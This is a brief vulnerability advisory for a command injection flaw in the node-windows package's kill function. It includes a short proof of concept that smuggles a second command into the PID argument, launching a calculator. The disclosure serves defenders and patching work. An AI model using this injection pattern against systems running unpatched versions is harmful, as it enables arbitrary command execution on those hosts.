CVE-2021-45459: OS Command Injection in node-windows

Description

lib/cmd.js in the node-windows package before 1.0.0-beta.6 for Node.js allows command injection via the PID parameter.

Proof of Concept

// poc.js
var wincmd = require('node-windows');

wincmd.kill("12345; calc.exe", function(){
    console.log('Process Killed');
});

References

• GHSA-53xv-c2hx-5w6q
• coreybutler/node-windows@1.0.0-beta.5...1.0.0-beta.6